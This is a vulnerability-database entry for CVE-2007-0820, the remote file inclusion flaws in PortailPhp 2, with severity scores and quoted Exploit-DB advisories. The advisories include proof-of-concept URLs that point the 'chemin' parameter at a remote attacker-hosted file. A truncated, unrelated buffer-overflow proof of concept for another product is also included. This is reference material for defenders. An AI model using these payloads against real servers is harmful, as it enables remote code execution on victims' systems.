CVE-2007-0820
published 2007-02-07CVE-2007-0820: Multiple PHP remote file inclusion vulnerabilities in Cedric CLAIRE PortailPhp 2 allow remote attackers to execute arbitrary PHP code via a URL in the chemin…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.15%
94.1th percentile
Multiple PHP remote file inclusion vulnerabilities in Cedric CLAIRE PortailPhp 2 allow remote attackers to execute arbitrary PHP code via a URL in the chemin parameter to (1) mod_news/index.php, (2) mod_news/goodies.php, or (3) mod_search/index.php. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cedric | claire_portailphp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PortailPHP 2.0 - 'mod_search' Remote File Inclusion
exploitdb·2008-04-21
CVE-2007-0820 PortailPHP 2.0 - 'mod_search' Remote File Inclusion
PortailPHP 2.0 - 'mod_search' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/28867/info
PortailPHP is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying computer; other attacks are also possible.
PortailPHP 2.0 is vulnerable; other versions may also be vulnerable.
http://www.example.com/portailphp_path/mod_search/index.php?chemin=ZoRlu.txt
Exploit-DB
PortailPHP 2 - '/mod_news/goodies.php?chemin' Remote File Inclusion
exploitdb·2007-02-03
CVE-2007-0820 PortailPHP 2 - '/mod_news/goodies.php?chemin' Remote File Inclusion
PortailPHP 2 - '/mod_news/goodies.php?chemin' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/22381/info
PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PortailPHP 2 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/mod_news/goodies.php?chemin=http://site.com/file.txt?%00
Exploit-DB
PortailPHP 2 - '/mod_news/index.php?chemin' Remote File Inclusion
exploitdb·2007-02-03
CVE-2007-0820 PortailPHP 2 - '/mod_news/index.php?chemin' Remote File Inclusion
PortailPHP 2 - '/mod_news/index.php?chemin' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/22381/info
PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PortailPHP 2 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/mod_news/index.php?chemin=http://site.com/file.txt?%00
Exploit-DB
PortailPHP 2 - '/mod_search/index.php?chemin' Remote File Inclusion
exploitdb·2007-02-03
CVE-2007-0820 PortailPHP 2 - '/mod_search/index.php?chemin' Remote File Inclusion
PortailPHP 2 - '/mod_search/index.php?chemin' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/22381/info
PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PortailPHP 2 is vulnerable to these issues; other versions may also be affected.
http://www.example.commod_search/index.php?chemin=http://site.com/file.txt?%00
Exploit-DB
Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC)
exploitdb·2007-02-02
CVE-2007-0766 Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC)
Remotesoft .NET Explorer 2.0.1 - Local Stack Overflow (PoC)
---
#/usr/bin/ python
print "--------------------------------------------------------------"
print "Remotesoft .NET Explorer 2.0.1 Stack Overflow"
print "url: http://www.remotesoft.com/"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "soundtrack: Firestarter (Prodigy)"
print "--------------------------------------------------------------"
try:
char = "\x41" * 80000
out_file = open('DotNet.cpp','wb')
out_file.write(char)
out_file.close()
print "File succesfully created!\n\n"
print "Here is a dump:"
print "pid=0820 tid=08C0 EXCEPTION (unhandled)"
print "----------------------------------------------------------------"
print "Exception C00000FD (STACK_OVERFLOW
No writeups or analysis indexed.
http://osvdb.org/35756http://osvdb.org/35757http://osvdb.org/35758http://www.securityfocus.com/bid/22381http://www.securityfocus.com/bid/28867https://exchange.xforce.ibmcloud.com/vulnerabilities/42123http://osvdb.org/35756http://osvdb.org/35757http://osvdb.org/35758http://www.securityfocus.com/bid/22381http://www.securityfocus.com/bid/28867https://exchange.xforce.ibmcloud.com/vulnerabilities/42123
2007-02-07
Published